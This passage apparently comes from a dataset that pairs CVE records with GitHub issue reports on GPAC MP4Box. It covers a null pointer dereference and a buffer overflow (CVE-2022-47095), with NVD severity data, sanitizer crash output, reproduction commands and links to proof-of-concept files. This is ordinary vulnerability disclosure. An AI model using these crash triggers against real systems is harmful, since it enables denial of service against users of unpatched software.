[MPEG-2 TS] PID 4144 reused across programs 8192 and 8192, not completely supported
Broken PMT descriptor! size 54, desc size 48 but position 20
[MPEG-2 TS] PID 4144 reused across programs 8192 and 8192, not completely supported
MORE sections on pid 4144
[MPEG-2 TS] PID 4144 reused across programs 8192 and 8192, not completely supported
[MPEG-2 TS] Invalid PMT es descriptor size for PID 5859
[M2TSDmx] Stream type 0x30 not supported - ignoring pid
filters/dmx_m2ts.c:343:51: runtime error: member access within null pointer of type 'struct GF_InitialObjectDescriptor'
```
# POC
[poc_nderef.zip](https://github.com/gpac/gpac/files/10202316/poc_nderef.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase | Null pointer dereference filters/dmx_m2ts.c:343 in m2tsdmx_declare_pid | https://api.github.com/repos/gpac/gpac/issues/2345/comments | 0 | 2022-12-11T13:39:08Z | 2022-12-12T09:59:03Z | https://github.com/gpac/gpac/issues/2345 | 1,489,995,127 | 2,345 | 4,585 |
CVE-2022-47095 | 2023-01-05T15:15:10.927 | GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2346"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2346"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/gpac/gpac/issues/2346 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Description
Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c
```c
for (i = 0; i < (num_scalability_types - splitting_flag); i++) {
dimension_id_len[i] = 1 + gf_bs_read_int_log_idx(bs, 3, "dimension_id_len_minus1", i); // overflow at dimension_id_len
}
```
# Version info
```
MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -add poc_bof6.mp4
```
Crash reported by sanitizer
```
[Core] exp-golomb read failed, not enough bits in bitstream !
[HEVC] Warning: Error parsing NAL unit
media_tools/av_parsers.c:7633:19: runtime error: index 16 out of bounds for type 'u8 [16]'
```
# POC
[poc_bof6.zip](https://github.com/gpac/gpac/files/10202354/poc_bof6.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase | Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c | https://api.github.com/repos/gpac/gpac/issues/2346/comments | 0 | 2022-12-11T13:53:19Z | 2022-12-12T09:59:03Z | https://github.com/gpac/gpac/issues/2346 | 1,490,015,617 | 2,346 | 4,586 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.